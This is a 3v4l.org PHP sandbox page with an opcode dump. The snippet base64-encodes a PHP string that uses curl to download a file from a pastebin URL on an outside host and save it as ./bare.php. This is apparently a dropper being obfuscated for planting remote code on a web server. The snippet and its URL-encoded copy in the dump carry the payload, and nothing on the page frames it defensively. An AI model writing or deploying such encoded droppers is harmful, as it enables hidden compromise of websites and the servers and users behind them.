3v4l.org

run code in 300+ PHP versions simultaneously
<?php echo base64_encode("\$url='http://inetpro.org/pastebin/ee43c37fdfdc449c9d5c5898edf546c4/view/raw'; \$ch = curl_init(); \$fp = @fopen('./bare.php', 'w'); \$timeout = 5; curl_setopt(\$ch, CURLOPT_FILE, \$fp); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, \$timeout); \$data = curl_exec(\$ch); curl_close(\$ch);");
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/h8hhN
function name:  (null)
number of ops:  5
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   INIT_FCALL                                               'base64_encode'
          1        SEND_VAL                                                 '%24url%3D%27http%3A%2F%2Finetpro.org%2Fpastebin%2Fee43c37fdfdc449c9d5c5898edf546c4%2Fview%2Fraw%27%3B+%24ch+%3D+curl_init%28%29%3B+%24fp+%3D+%40fopen%28%27.%2Fbare.php%27%2C+%27w%27%29%3B+%24timeout+%3D+5%3B+curl_setopt%28%24ch%2C+CURLOPT_FILE%2C+%24fp%29%3B+curl_setopt%28%24ch%2C+CURLOPT_URL%2C+%24url%29%3B+curl_setopt%28%24ch%2C+CURLOPT_RETURNTRANSFER%2C+1%29%3B+curl_setopt%28%24ch%2C+CURLOPT_CONNECTTIMEOUT%2C+%24timeout%29%3B+%24data+%3D+curl_exec%28%24ch%29%3B+curl_close%28%24ch%29%3B'
          2        DO_ICALL                                         $0      
          3        ECHO                                                     $0
          4      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
158.29 ms | 1393 KiB | 15 Q